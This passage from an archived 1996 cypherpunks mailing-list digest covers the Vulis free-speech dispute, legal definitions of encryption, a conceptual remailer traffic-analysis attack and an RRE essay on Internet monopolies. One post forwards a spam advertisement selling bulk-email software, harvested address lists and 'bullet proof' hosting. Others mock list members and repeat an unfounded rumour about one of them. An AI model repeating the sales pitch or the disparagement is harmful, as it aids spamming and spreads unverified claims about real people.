his machine. No contract means no contract. It applies to all parties
involved.

> PLEASE, let's not drag poor Tim into this. Hasn't he suffered enough?!
> This does not follow even from the tortured logic above.

Nobody ever suffers enough.

> "Implies the right"??  Rights either exist or do not exist (endowed by their
> Creator); they are not be implied.

I suggest you read the 9th Amendment again then. You obvously didn't get the
point the other time(s).

> The content of speech is certainly not irrelevant. Disruptive speech and
> behavior have never been protected.

Vulis's speech was not distruptive. It did not interfere with anyone else
being able to submit or filter submissions. His speech was outside the norm
but posed no threat to the operation of the cpunks mailing list.

> It says CONGRESS! We're not discussing an action by the federal govt. here.
> I may choose to ask those visiting my house to refrain from discussing mumbo
> jumbo; if the individuals persist, I can ask, nay demand, that they leave.  
> :
> :And just to make shure it is clear, the right to put something on the paper
> :(ie speech) is distinctly different from being the one doing the actual
> :printing.

Agreed. It was intended to make the point that this is the ideal we should
all be striving for. We as members of a free democratic society should NEVER
censor anyone on the content of their speech.

> What paper? What does this mean? 

This list is a digital press.

> Advertised? It has been a matter of regret that I _stumbled_ into this
> unruly tangle of wits.

Then you have not been reading a lot of computer and crypto related
material. I see references to this list and how to subscribe several times a
year in various sources going back several years.

> Simply because one has argued that "the list is ... a defacto public list,"
> don't make it so any more than my arguing that a newspaper available to the
> public can have no control over its own editorial policy.

True, but the paper MUST publish that policy in its editions. Which papers
and magazines do religously.


                                                           Jim Choate





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Sat, 9 Nov 1996 11:15:36 -0800 (PST)
To: bgrosman@healey.com.au>
Subject: Re: Legal Deffinition of Encryption?
In-Reply-To: <2.2.32.19961109040141.00956568@healey.com.au>
Message-ID: <Pine.LNX.3.95.961109141440.481C-100000@gak.voicenet.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sat, 9 Nov 1996, Benjamin Grosman wrote:

> I have absolutely no idea: this is a very interesting problem. Not for just
> compression and encryption differention legally, but also, well, ANY other
> data form. If one defines a new format for saving data (i.e a new image
> format), and then exports this technology from the USA, is this exportation
> of munitions due to it's unknown qualities? Or what? 
> I know that in Australia there have been problems defining electronic data,
> especially pictures (usually porn), for the purposes of prosecution.
> Because, really, a pornographic picture is no more than 1's and 0's arranged
> in a different way by a different algorithm. 
> Thus I think it most likely that the law would try and approach it from the
> direction of the algorithm that saved the data and the intent with which the
> algorithm was written.
> Otherwise, I don't know.

I can't define encryption, but I know it when I see it.

Mark
- -- 
finger -l for PGP key
PGP encrypted mail prefered.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQEVAwUBMoTYxCzIPc7jvyFpAQGs3wf/dcGpcRTLeoI84FcYgM1KFr7hkIyt6/bW
iAWaKbQmuNOs55KYkPUhqR9EaToXzOGN3MNT/L40auw4jEf2GHtereBh2gF6yX5p
l5yKqsotFwCuoHrGbOhJC351cpn0O04Zmq4uPfcVCQYpHW+zlJfRdcSBp1XXPZwm
bcXSp08XfhlIg+clg1R4L76SlnieKKE+6+upOv9Dq5l8s3F8OEe/jI/ff3DFKBxo
qHIqrZWzd6lCZtaiqBiL4PoyKE65Fx3yZrlaIhUsYvbCwyYXmz7N5sUrP4y17fGI
gICy7W+KUegiFoit3sdpa38R/J3EoVzVSTxpjvHvYXIz4gr+8QjdDw==
=HeWI
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ernest Hua <hua@chromatic.com>
Date: Sat, 9 Nov 1996 14:25:54 -0800 (PST)
To: cypherpunks@toad.com
Subject: Son of Cyberpromo?
Message-ID: <199611092225.OAA21046@server1.chromatic.com>
MIME-Version: 1.0
Content-Type: text/plain


The message speaks for itself.

Ern

--------

 Return-Path: MREMAIL@red.pobox.net
 Received: from red.pobox.net (www1-208-135-28-26.asatte.com [208.135.27.80]) by xenon.chromatic.com (8.7.5/8.7.3) with ESMTP id SAA24960 for <hua@chromatic.com>; Fri, 8 Nov 1996 18:50:57 -0700 (PPET)
 Message-Id: <199611090150.SAA24960@xenon.chromatic.com>
 Received: from MR.EMAIL
           (Cust27.Max22.Los-Angeles.CA.MS.UU.NET [153.34.81.27])
           by red.pobox.net (post.office MTA v1.9.3b ID# 0-10245) with SMTP
           id AAW87; Fri, 8 Nov 1996 17:46:00 -0800
 From: MREMAIL@MREMAIL.COM
 To: YOU@YOU.COM
 Date: Fri, 08 Nov 1996 17:48:54 PST
 Subject: I M P O R T A N T ! ! !

 EMAIL WORKS $499.00

 WE KNOW YOUR BUSINESS

 Our software and provider service enables any business to launch a professional and effective mass
 marketing of a product or service via bulk email. Our mission is to give the average, small or new
 business, and even the big guys, the tools required to utilize the Internet for generating sales figures
 not achievable through conventional advertising.

 EMAIL WORKS V3.1A

 EMail Works v3.1 is by far the most advanced bulk e-mail software available on the market. It's
 power and depth are only matched by it' s ease of use.

 Features

     Sends at 13000 to 15000 per hour with 14.4 modem
     Posts to thousands of news groups automatically
     Collects at 75000 per 24 hours
     Works while your computer is: surfing, getting email or word processing
     Easy to use remove name feature.
     Parsing table 45000 to 100,000 per hour
     Stand alone - NO Pegasus-Eudora-Freedom- or other email program needed
     Sends & Gathers & Parsing at the same time!
     Marketing Tables
     Time & date stamp on all mailings
     Filtering system
     Auto remove screen disables mail from being sent to people who dont want     it!

 When SoftCell becomes your postmaster you will never lose your e mail
 addresses, dial-up connection or web site domain ever again.

 BULLET PROOF WEB SITE DOMAIN 10mg
 never have your site ripped down again

 10 MEG WEB DOMAIN
 We move your site and transfer or register your domain with internic

 REMOVE NAMES
 All mail is parsed against several large remove name lists

 5 Meg FLAME PROOF E MAIL BOX
 We will not except multiple message or unmarked attachments from any user.

 FIRE WALL
 Over 70,000 e mail addresses that can not access our server

 AUTO RESPONDER
 Easy and fast response

 Additional provider services:

     Online secure credit card transactions $35.00 per mo.
     Shopping Basket $20.00 per mo.
     Additional Auto responders $15.00 per mo
     Additional E Mail Accounts $30.00 per mo
     Additional Web space $10.00 per Mg per mo.

 Access our remove name and parse out the undeliverable and remove names $49.00 per month!

 Bulk E-Mailing Services

 E Mail addresses for sale
 Our addresses are by far the best available on the internet because they are all 75+% deliverable and we
 never sell the same list to the same type of business twice. We currently have over 7 million active
 e mail addresses.

 100,000 $199
 300,000 $399
 500,000 $599
 1 Million $1000

 Bulk E-Mailings DONT HAVE THE TIME? WE DO!

 1.5 Million

 1 Time $1200
 2 Time $900
 3 Time $800
 4 Time $700
 5 Time $500

 Web Design
 Free web design and hosting can be arranged for companies & can show net earnings in excess of 1
 Million dollars. In return for a percentage of sales SoftCell Marketing will develop, host and
 maintain you web site.

 Call now for more information: 714-825-4815

 F R E E  D E M O  D O W N L O A D ! ! !
 CALL NOW -- MR. EMAIL (DAVID)

 SoftCell Marketing Inc. CONTRACT

 IMPORTANT! FAX THIS LEGAL DOCUMENT TO: 714-574-9773

 NAME:_____________________________________________

 COMPANY NAME:_____________________________________

 ADDRESS:__________________________________________

         __________________________________________

 TELEPHONE:________________________________________

 BUSINESS PHONE:___________________________________

 FAX:______________________________________________

 CREDIT CARD TYPE:_________________________________

 CREDIT CARD NUMBER:_______________________________

 CREDIT CARD EXPIRATION:___________________________

 E-MAIL ADDRESS:___________________________________

 The business or company herein is referred to as the
 client, and SoftCell Marketing Inc. is referred to as
 "Company" , enter into this agreement to be effective as
 of date accepted by the "Company" subject to the
 following conditions: As a client I understand that the
 Company makes no Guarantee of success or financial gain.
 As a client I realize the "Company" is authorized to bill
 client credit card or cash client check or money order
 plus shipping and handling for "company"servivices
 or products.  As a client I realize that the
 company will place my order for provider service to be
 billed on the (first) of the month, each and every month
 until a 30 day written notice is received from client.
 As a client I understand that once the "Company"
 has rendered services, or the client has been issued an
 access code, unlock code, turn on code or credit card
 approval have been gained, no refunds are possible.

 Please check the box(s) that apply:

 BOX 1:_____  EMAILWORKS V3A $499.00
 BOX 2:_____  PROVIDER SERVICE $99.00 PER MONTH.
                           WITH FIRST AND LAST MONTH AND $75.00 SET UP FEE.
                           TOTAL $273.00
 BOX 3:_____  BOTH (BOX 1 AND 2) TOTAL $772.00

 CLIENT SIGNATURE:_________________________ DATE:___________




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Reid <steve@edmweb.com>
Date: Sat, 9 Nov 1996 14:35:28 -0800 (PST)
To: cypherpunks@toad.com
Subject: Another possible remailer attack?
Message-ID: <Pine.BSF.3.91.961109134348.182B-100000@bitbucket.edmweb.com>
MIME-Version: 1.0
Content-Type: text/plain


>Date: Fri, 8 Nov 1996 12:58:42 -0800
>From: nobody@cypherpunks.ca (John Anonymous MacDonald)
>Subject: Vulis on the remailers
> Please, remailers, source block Vulis for a week.
> Remailer Fan

Suppose you operate an ISP and you suspect that one of your users (let's
call him Dimitri) is using anonymous remailers to submit politically
incorrect messages (under a pseudonym, or all with the same writing style)
to Usenet, mailing lists, and a well-known phreak/hack publication. Also
suppose that these public messages are appearing on a regular basis. 

You want to know if Dimitri is the person regularly posting these
messages. So, you use your powers as ISP to block his access to all
remailers. If the public messages suddenly stop then you can be reasonably
certain that Dimitri was sending them. 

I expect this would work even against DC nets.

The only solution I can think of is to have an account with multiple ISPs
and always send mail from more than one account. This probably wouldn't
offer much protection against TLAs (NSA, CIA, FBI, MCI, AT&T ;) who may be
able to block traffic no matter where it comes from. 

Comments?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Sat, 9 Nov 1996 12:33:43 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: FW: Dr. Vulis is not on cypherpunks any more [RANT] (fwd)
Message-ID: <199611092037.OAA01232@einstein>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> From: "networks@vir.com" <networks@vir.com>
> Date: Thu, 7 Nov 1996 15:15:38 -0500
> 
> It seems that, like a bookstore, the cypherpunks mailing list has the
> right to choose the content it distributes and who it distributes the content
> to.

Actualy bookstores distribute the books they are under contract to distribute
via the publishers they have contracts with. An easy way to tell if a
bookstore is a reasonable distributor and one with some level of ethics is
to ask if they participate in the yearly banned books week. If they don't I
would suggest you go elsewhere.

Businesses in general are not allowed to prohibit patrons based on their
belief, speech, or action unless it can be shown to pose some threat to the
operation of the business or they post said policy in a public place where
patrons can see it. 

An example may be in order. Here in Austin, TX. we have a problem with bums
and kids who are homeless. They urinate on the walls and commit various
other acts that are not acceptable to the community at large. In order to do
anything about these people on public property the city HAD to pass two
laws. These two laws are that it is now unlawful to camp overnite on public
property. In effect you cannot reside on public property in Austin, TX
between midnite and 6am. The other law was that it is now a crime in Austin,
TX to emit a 'objectionable odor in public'. Strictly interpreted if you are
in a city park at 12:01AM or before 6:00AM you can be arrested. Also, if
you were to emit a fart outside your personal property you can be arrested.
(Note that these laws have not resolved the indigent problems we have here)

In short without this law (ie contract) it was not possible for the city or
private businesses to do anything about this.

>  Bookstores are free to select what titles they offer for sale, and can
> even refuse to sell a book to a particularly annoying customer if they
> so choose (my legal knowledge is lacking, but I think this is correct).

Irrelevant. The point is that bookstores are not legaly responsible for the
contents of those books except in very special cases. The distributors or
publishers are responsible. This list qualifies as a publisher so long as
it retains editorial control of content of submissions prior to distribution.
If they have no editorial control then they are in the situation of a
bookstore which is protected from legal action on the contents of the books
they carry except under special conditions. The action taken by the list
operator explicity acts as an example of that editorial control.

> To extend the analogy, what has happened in this particular case 
> is that Dr. Vulis is now forced to buy all his books by mail order :)

What has happened here is that a member of a community has been expunged
based on their beliefs. Not on any particular action they took which posed
any sort of threat to that community.

                                                   Jim Choate






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Benjamin Grosman <bgrosman@healey.com.au>
Date: Fri, 8 Nov 1996 20:04:45 -0800 (PST)
To: "William H. Geiger III" <whgiii@amaranth.com>
Subject: Re: Legal Deffinition of Encryption?
Message-ID: <2.2.32.19961109040141.00956568@healey.com.au>
MIME-Version: 1.0
Content-Type: text/plain


Dear Sir,

>Is there any law(s) that actully define encryption?
>
>At it's very basics encryption is taking a group of 1's & 0's converting
them into a different group of 1's & 0's and providing a mecanisim to change
them back to the original group of 1's & 0's.
>
>>From a legal standpoitnt how is PGP any different than PKZIP? How does the
law make a diference between an "encryption" program and a "compression"
program other than the fact that the encryption program is advertized as
encryption and the compression program is advertized as compression?

I have absolutely no idea: this is a very interesting problem. Not for just
compression and encryption differention legally, but also, well, ANY other
data form. If one defines a new format for saving data (i.e a new image
format), and then exports this technology from the USA, is this exportation
of munitions due to it's unknown qualities? Or what? 
I know that in Australia there have been problems defining electronic data,
especially pictures (usually porn), for the purposes of prosecution.
Because, really, a pornographic picture is no more than 1's and 0's arranged
in a different way by a different algorithm. 
Thus I think it most likely that the law would try and approach it from the
direction of the algorithm that saved the data and the intent with which the
algorithm was written.
Otherwise, I don't know.

Yours Sincerely,

Benjamin Grosman





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Sat, 9 Nov 1996 12:09:09 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: allow me to state the obvious....
In-Reply-To: <9610098475.AA847591051@smtp-gw.cv62.navy.mil>
Message-ID: <Pine.LNX.3.95.961109150431.676B-100000@gak.voicenet.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sat, 9 Nov 1996 SUCRUM22_at_INDY-ADP@smtp-gw.cv62.navy.mil wrote:

> i am your average joe who uses the computer for work and e-mail and the 
> occasional jaunt into the internet. going along reading this whole 
> crypto-anarchy thing makes me want to cry. the whole point of cryptography 
> is getting info from my eyes to yours. period. you can say that "illegal" 
> information passes along the internet, but hello people - illegalities have 
> been going on since long before the invention of the computer (or even the 
> notion of cryptography - if i may stop to point out the obvious).  the only 
> reason _i_ use encrypted stuff is because i don't want my nosy sysadmin 
> reading my mail.  its that simple.  think about it.  how many times is your 

Plain cryptography isn't the main point.  The protocols (such as anonymous
digital cash, message pools, DC-nets, etc.) allow things to exist that are
not possible without cryptography.  These protocols make laws (especially
victimless laws) much more difficult to enforce.

> e-mail handed off?  when sent it naturally follows the most convenient path 
> to its destination, and even anonymous re-mailers (can) keep a hard copy of 
> the messages that cross their connections with the original address 
> included.  you can go off into spoofing address and so on, but your average 
> joe may (or may not) have the time or knowledge (much less the motivation) 
> to do that.  keep that in mind before you go saying that crypto is a 
> good/bad thing. 

In order for anonymous remailers to be completely anonymous, only one remailer
in the chain has to be trustworthy.  If a message is chained through N
remailers and N-1 of those remailers are run by spooks, the anonymity of the
message depends on the remaining remailer.

Mark
- -- 
finger -l for PGP key
PGP encrypted mail prefered.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQEVAwUBMoTlLyzIPc7jvyFpAQEXGQf/VN8uNK7+uUWdNqcip2dHkPVFLjZlItBf
dcilb36/zBJikX1XIOHbk15X/s4N/bM1WfAAYqPikI7jfcVkbxw0j0gTwVTYY1Wu
AbbdAh1o47CYe55eqEhcirfQQEMMHaZ/7DXKj+mdDeBWACZqHbOmx25spChH0fi+
3i3AhF23kBNxb4H/MNLTA9Fb6mzGsGsXmzDEJHnVPxQQG8uUQcBd6qVkBdLu05++
YYV60gr2vXb5LCLgIbhzT3Q/pFC2k2wkh9Wn+V+FgU1SwJleMWNOcY1nuU4ylND4
EncDq44AlWpt54fzu96saOz1DZgczyTaLnM2ZktywsH43WQ00eVw8A==
=7FDt
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 9 Nov 1996 13:30:32 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: No More
In-Reply-To: <199611091210.GAA01799@dogbert.ipa.net>
Message-ID: <8075wD3w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


brazie@ipa.net (Brazie) writes:

> At 06:53 PM 11/8/96 -0500, YoungSik Jeong wrote:
> >I want take off mail list
> >
> >
> >so do i, i tried but i keep getting all this damn mail

Try pointing out that Timmy May is a lying bully, and you'll be unsubscribed
in no time. :-)

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L.Detweiler" <ldetweil@csn.net>
Date: Sat, 9 Nov 1996 14:50:19 -0800 (PST)
To: cypherpunks@toad.com
Subject: Timmy
Message-ID: <199611092250.PAA23102@teal.csn.net>
MIME-Version: 1.0
Content-Type: text/plain



just heard an interesting rumor that Timmy has been blacklisted
from working anywhere here in Colorado as a dangerous anarchist
and/or lunatic revolutionary.

but perhaps he can still work in Silicon Valley if anyone there is
willing to hire a debauched millionaire playboy.  the standards
are different where no one wants to live, I guess. (hmmmm, catch
that recent cool article on CO in National Geographic?)

besides, everyone here in CO would prefer all the
anarchists stay in CA anyway so they can all be taken care of
in one fell swoop with the next "big one".. did I feel
a little "trembling" over there or is it just the standard cpunk
cowardice? (hehehe)


|   /\  |\| /~ L~
L_ /~~\ | | \_ L_
http://www.csn.net/~ldetweil/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David Lesher / hated by RBOC's in 5 states" <wb8foz@wauug.erols.com>
Date: Sat, 9 Nov 1996 13:16:24 -0800 (PST)
To: ph@netcom.com (Peter Hendrickson)
Subject: Re: Black Unicorn exposed?
In-Reply-To: <v02140b03aeaa71ed1c84@[192.0.2.1]>
Message-ID: <199611092116.QAA05345@wauug.erols.com>
MIME-Version: 1.0
Content-Type: text/plain


Peter Hendrickson sez:
> 
> At 11:00 AM 11/9/1996, Robert Hettinga wrote:
> > S. L. vonBernhardt, <mailto:unicorn@schloss.li>,...
> 
> Black Unicorn recently stated that had taken measures to shield
> his identity so that people would be unable to cause harm to
> his professional activities by making unsubstantiated claims
> that could scare off prospective clients.
> 
> It appears now that this protection has evaporated.  

How do you know he does not have a THIRD name........?

-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. Allen Smith" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sat, 9 Nov 1996 13:21:32 -0800 (PST)
To: cypherpunks@toad.com
Subject: RRE: notes (8 Nov 1996)
Message-ID: <01IBNCKT4KUOA73IB7@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	This has a rather chaotic mixture of inapplicable and useful
information; I'll try to edit out the non-useful stuff (via [...]). He's made
the distinct goof of misidentifying libertarianism with 60's style
anarchosocialism, as well as other problems... I'll be emailing him myself
with some comments.
	-Allen

From:	IN%"rre@weber.ucsd.edu"  9-NOV-1996 05:26:15.31
To:	IN%"rre@weber.ucsd.edu"
CC:	
Subj:	notes

Notes on network computers, blind copies, democratic culture, monopolies,
and the idea of an Internet establishment...


As a periodic reminder, a Web archive of nearly all the RRE messages ever
sent can be found through  http://communication.ucsd.edu/pagre/rre.html


It turns out that the article on cryptography by Bruce Schneier that I
forwarded from the Risks Digest the other day was actually an unfinished
draft that Peter Neumann sent out by mistake.  Bruce asks that everyone
refrain from propagating that version around the net.


Steve Lohr's article on the "network computer" in Monday's New York Times
includes the following priceless quotes:

  The line between these network computers being used as really effective
  corporate tools and being used as mind-control tiger cages is a fine
  one.  There will be a real temptation for corporate managers to go too
  far in the direction of control.
    -- Paul Saffo

  The paradise of shared knowledge and a more egalitarian working
  environment just isn't happening.  Knowledge isn't really shared because
  management doesn't want to lose authority.
    -- Shoshana Zuboff

  What's a floppy disk?  It's a way to steal company secrets.
    -- Scott McNealy

  We think we can go after the dumb-terminal market too.
    -- Bill Gates

I wish we could rewind this whole computer revolution thing and start over.


[...]


Non-Americans keep remarking on the predominance of American items on
RRE.  That's simply a function of the items that RRE subscribers send me.
If you come across interesting items from other countries, I hope you'll
consider sending them along.


[...]


A while back, I came across an op-ed column addressed to teen-agers which
purported to explain certain points about life.  The first of these points
was, and I quote,

  Life's not fair.  Get used to it.

All of the points were like this: each of them presupposed that their
reader held a putatively naive or self-serving opinion about life,
and they proposed to set the reader straight in a remarkably nasty and
disrespectful way.

I view this article as part of a larger and very depressing trend: the
return of authoritarian culture.  The purpose of authoritarian culture
is to instil a mindless obedience to authority.  It employs two basic
methods.  The first of these methods is stereotype: one's normal human
tendencies to think critically and oppression resist are caricatured
and ridiculed; endless stories are adduced to portray people who employ
these innate faculties in a bad light; and labels such as "whining" and
"complaining" and "victim" are liberally applied.

The second method of authoritarian culture is the attempt to naturalize
authority by hiding it behind large abstractions.  In this case, the
abstraction in question is "life".  Having established that "life" is
unfair, it becomes possible to label any protest against unfairness as
a demand that the whole world conform to one's own immature whims.  These
teenagers are counseled to "get used to it" and to reconcile themselves to
a life of being treated unfairly.  No liberal nostrums about self-esteem
here: this columnist's message was that nobody deserves to be treated with
respect, and that it's arrogant to think otherwise.

Another example of authoritarian culture is the contemporary American
use of the word "accountability".  Accountability, we are told, means
"accepting the consequences of your actions".  Everyone is supposed
to "be accountable", and to embrace this condition as a concomitant of
responsible adulthood.  Authority here is hidden through a grammatical
device.  In normal usage, the word "accountable" takes a complement,
as in "accountable to ...".  When the complement is omitted, the human
authority is displaced into the woodwork, and obedience to that authority
is conflated with a variety of quite different conditions: responsibility,
honesty, etc.  No reasonable person has a problem with the idea of being
responsible for one's actions.  But nobody who believes in a democratic
society can accept the idea that any person has absolute authority to
judge any other person's actions, and hand down "consequences", without
likewise being constrained by norms of responsibility, which in the old
days were called "justice" and -- yes, that's right -- "fairness".

It is not surprising when people in authority employ such language.  But
authoritarian culture requires more: it requires that people internalize
this language, applying it to themselves and dissociating all desire for
justice and fair treatment.  We all have our failings, but we we cannot
have a decent society unless everyone is treated with respect and judged
with a reasonable regard for proportionality and due process.  Healthy
people don't just "get used to" injustice.  Quite the contrary, genuine
maturity begins with the skill and discipline of helping people organize
to identify and overcome injustice.  Shame and ridicule are the least
violent of the tools that have historically been employed to condemn
people to passivity.  But they are also the most basic and, in the end,
the most destructive.

The basic method for promoting an extreme position is to harp on the evils
of the opposite extreme.  Authoritarian culture thus lives in a symbiotic
union with its evil twin, libertarian culture, whose sole value is freedom
from constraint.  The symbiosis between authoritarian and libertarian
culture has many facets:

 * Authoritarian culture holds that people are essentially bad and that
nothing can be done about this; libertarian culture holds that people
are essentially good and that nothing needs to be done to encourage this.

 * Authoritarian culture imposes constraint without respect for individual
dignity; libertarian culture holds that individual dignity consists in the
absence of constraint.

 * Authoritarian culture holds that people are innately irresponsible;
libertarian culture denounces responsibility as an authoritarian myth.

 * Authoritarian culture and libertarian culture both conflate feelings
with action, authoritarian culture to repress them both and libertarian
culture to license them both.  

 * Authoritarian culture crushes the spirit and eventually gives rise to
an immature impulse toward libertarian culture; libertarian culture stands
indifferent as great industries arise to support an epidemic of addiction,
which then gives rise to a fearful impulse toward authoritarian culture.

What authoritarian and libertarian have in common is their claim to follow
a simple, objective rule that lies beyond human interpretation: the rule
of order or the rule of freedom.  The terra incognita that lies beyond
the dysfunctionality of both authoritarian and libertarian culture is
democratic culture: the form of culture within which everyone takes
responsibility for living together constructively.  Democratic culture
is not just a matter of voting.  It is a set of values, and it is a
set of skills.  Some of these skills are organizational: you can't have
democratic culture unless people know, deep down in their bones, how to
hold a productive consensus-based meeting.  Other skills are emotional:
you can't have democratic culture unless people can tell the difference
between resisting oppression and acting out resentment, between organizing
and polarizing, between freedom and irresponsibility, between pleasure and
addiction, between discipline and shame, between personal boundaries and
passive aggression.

The sixties have left an ambiguous legacy because they blurred together
two very distinct impulses: countercultural libertarianism, for which I
don't have an awful lot of respect, and democratic experimentation, for
which I have a great deal of respect.  Recreational drug use, for example,
is stupid and boring.  But the democratic organizing traditions that arose
and flourished in the sixties were an important cultural contribution, and
it's sad to see them forgotten.  The rise of authoritarian culture depends
on this forgetting, and on crushing at an early age the hopes for human
dignity with which all of us are born.

Why isn't this obvious?  One reason is that the American conservative
movement originated as a marriage of convenience between authoritarians
and libertarians, both of whom portrayed themselves as opponents of
something called "government".  But opposition to government tout court
is opposition to democracy.  We have been inundated in recent years by
rhetoric that seeks to make democracy literally unthinkable by conflating
all types of government, whether democratic or totalitarian, into a
single stereotype of oppression.  This stereotype requires its proponents
to construct themselves as powerless victims, and it licenses all sorts
of whining and complaint by the very people who make a big point of
censuring whining and complaint by others.  By treating the institutions
of a democratic society as inherently beyond control, it also licenses
an abdication of personal responsibility -- the responsibility to learn,
practice, and teach the values and skills of a democratic society.


Back in the Later Middle Ages, around 1994, I often found myself lectured
by experts who asserted that great bureaucratic institutions, government
and corporate alike, would necessarily and inevitably disintegrate in the
world of the Internet.  It's almost 1997 now, and as the months go by I
find it ever harder to remember why this great disintegration was supposed
to take place.  If evidence counts for anything, we are actually living
in an unprecedented era of concentration and centralization.  ABC has now
become the Disney Infomercial Channel, and British Telecom is buying MCI.
And the more I learn about Internet economics, the more the Internet seems
like a veritable engine of monopoly-creation.  The reasons are numerous.
Most of them are explained in the recommendations and bibliographies that
I have provided in past issues of The Network Observer, and any one of
them would suffice:

 * The Internet backbone business, like any other utility, involves high
fixed costs and low marginal costs of serving additional customers, so
that bigness is highly rewarded.  And every provider has an incentive to
give priority to packets that remain within its network, thus giving a
quality-of-service advantage in the market to whichever provider first
establishes a dominant position in a given segment of the market for
network services.

 * The pattern of high fixed costs and low marginal costs is even stronger
for software: if two software products compete then the price of each is
determined by its development costs divided by the number of customers.
As a result, other things being equal, the company with the larger market
share completely destroys its competition.  If other things aren't equal,
a company with an existing flow of monopoly rents can simply give away its
products until its competitors' capital is depleted.

 * And then there are de facto standards: the dynamics of standards are
fantastically complicated, but the Internet still needs several additional
service layers, and even a single proprietary standard could give one
firm immense power to extract rents from Internet users and dictate future
directions for Internet architecture.  Since most of the forthcoming
standards will be implemented in software, the monopoly tendencies of the
software market will promote the rise of proprietary networking standards.
Past experience with the Internet is misleading: small players and ARPA
philosopher-kings can establish a new standard in the world if the big
players are asleep, but the big players are awake now.  In the future it
will take capital and speed to impose a standard, and winner takes all.

 * The economics of information -- "content" -- are no more reassuring.
Since information can be replicated cheaply, an overwhelming, life-or-
death incentive exists to leverage creative effort across as many channels
as possible.  Of course, every industry has an incentive to increase its
revenue.  But as the marginal cost of selling additional units approaches
zero, prices are directly determined by market share, thus giving rise to
a positive feedback loop and eventual monopoly.  This suggests that, to
the extent that the Internet is a vehicle for the delivery of information
commodities, it will necessarily be absorbed into the institutions of the
media system.  Nobody will be able to afford to produce a news service
that only operates on the Internet, for example, given that existing news
services can adapt their work to the Internet for much less than it costs
to produce a competing service from scratch.  And content providers who
already operate in other media will have a powerful incentive to adapt
their services to the Internet, provided only that additional money can
be made by providing those services in the Internet medium.

It is commonly argued that the Internet, by reducing transaction costs,
will cause organizations to break apart and industries to reorganize on a
more entrepreneurial basis.  I have argued this myself.  But the argument
doesn't work.  The Internet (and not only the Internet, but a world of
other technologies) reduces transaction costs and coordination costs
alike, making it less efficient to operate large organizations that cross
many disparate functions but more efficient to operate large organizations
that do one standardized thing.  Thus we have waves of both outsourcing
(due to decreased transaction costs) and concentration (due to decreased
coordination costs).  And high-tech industries increasingly favor those
firms that can see standards battles coming and prepare to fight them in
a coordinated way.

Other arguments against the monopoly scenarios have more force.  Internet
service provision is not yet a monopoly, and it is not obviously headed
in that direction right now.  Nobody understands the ISP business very
well, and it would appear that the smaller entrepreneurial firms have
an advantage in adaptability in an environment of rapid technological
and market change.  AT&T, moreover, would seem to be falling apart at
the seams in very much the fashion that Schumpeter, that patron saint
of entrepreneurs, would have predicted.  Even MCI has been hitting itself
on the head pretty hard during the last few years.  So my point is *not*
that the Internet is definitely going to be locked up by cigar-smoking
corporate titans.

My point is simply this.  It's almost 1997, and yet the airwaves and
magazine pages are still full of ideologues, still reciting old-wave
technological determinist mantras about how the Internet will inevitably
bring us a decentralized world of freedom.  Technological determinism,
however, is a kind of cargo cult: it asserts that we can obtain a happy
society if we simply work hard enough at idolizing the technology.  The
world doesn't work like that.  Significant forces are operating in several
directions, some of those directions are more pleasant to contemplate
than others, and the outcome is not preordained.  It seems to me that
the proponents of a totally unregulated economy should learn a little
more economics.  It also seems to me that it's time for a revival of
the democratic values that make it possible to imagine a conscious choice
about our technological future.


[...]


After my comment about the Journal of Internet Banking and Commerce
the other day, I got an irate message from the Journal's editor.  Among
his less extravagant suggestions was that I am a member of the Internet
establishment who has the power to destroy people with a word.  Gosh.
My first response was to wonder if Hallmark has a card for this occasion:

  To a childhood friend, after all these years

  I can still remember how, it seems
  You never picked me for your teams
  I have no idea now where you've went
  But I'm a member of the Internet establishment
  So you better watch out what you say
  Or with my keyboard I'll blow you away

Then I thought about it more seriously.  I'm not here to take shots at
struggling Internet publications, unless you count Slate.  My only goal
had been to plug the Scout Report, and the truth is that I was too lazy
to dig up an issue of TSR that I was 100% comfortable with.  I won't go
into the reasons for the opinion I formed of JIBC back in the spring,
since you can easily judge for yourselves.  Of course I should take
ordinary care not to slam people at random, and by trying to run this
list in odd moments of the day I'm all too likely to get careless.  The
harder question is, is this guy right?  Never mind that he had a grossly
exaggerated estimate of RRE's readership -- the idea that I am a member
of any kind of establishment is completely foreign to me.  Of course,
this could simply be a self-serving delusion.  After all, as a white
guy who was born in the United States, I enjoy numerous social privileges
that I have never earned.  And as a graduate student at MIT, my cohort and
I were located so close to the center of the post-WWII military-academic
complex that we had the resources to pretend that we were antiestablishment
nonconformists.  Still, if the Internet establishment exists and holds
councils, I have never been invited to them.  I have met some of the
